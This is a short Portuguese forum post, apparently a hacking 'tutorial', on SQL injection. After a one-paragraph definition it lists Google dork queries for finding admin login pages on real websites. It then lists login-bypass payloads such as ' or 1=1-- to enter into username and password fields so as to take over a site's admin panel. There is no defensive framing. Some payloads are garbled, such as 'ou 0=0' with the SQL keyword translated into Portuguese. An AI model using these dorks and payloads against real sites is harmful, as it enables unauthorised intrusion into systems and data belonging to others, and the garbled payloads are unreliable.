[ Tutorial ] SQL INJECTION

o queé sql injection ? .
'Structured Query Language' (SQL) é uma linguagem textual usada para interagir com uma base de dados relacional. A unidade de execução do SQL é uma 'query', que é uma coleção de instruções que retornam uma pesquisa na base de dados. Os comandos e parâmetros de uma 'query' podem modificar a estrutura da base de dados (usando instruções Data Definition Language, ou DDL) e manipulando o conteúdo dos bancos de dados. (usando insturções Data Manipulation Language, ou DML).
SQL Injection ocorre quando o atacante consegue inserir uma série de intruções SQL dentro de uma 'query' através da manipulação das entrada de dados de uma aplicação.
Como Achar um site vulneravel .
va no site da google e jogue algum desses codigod abaixo , ira aparecer varias paginas que vai te levar ate o login do adm do site entao voce vai pra segunda parte
allinurl:/compras/admin/
allinurl:/clientes/admin/
allinurl:/busines/admin/
allinurl:/area_restrita/admin.asp
allinurl:/area_restrita/login.asp
allinurl:/area_restrita/index.asp
allinurl:/acesso/admin.asp
allinurl:/acesso/admin/default.asp
allinurl:/acesso/admin/index.asp
allinurl:/post/admin/default.asp
allinurl:/post/admin/
allinurl:/post/admin/index.asp
allinurl:/post/admin/login.asp
Como loga no adm do site.
Jogando algum desses codigos no campo de login e senha caso ele seja vul ele ira abri o adm do site com tudo ai e so vc mexer e owna :F
b' or ' 1='
' or '1
' or '|
' or 'a'='a
' or ''='
' or 1=1--
') or ('a'='a
' or '1'='1
admin ' - -
' ou 0=0 --
"ou 0=0 --
ou 0=0 --
' ou 0=0 #
"ou 0=0 #
ou 0=0 #
Editar/Deletar Mensagem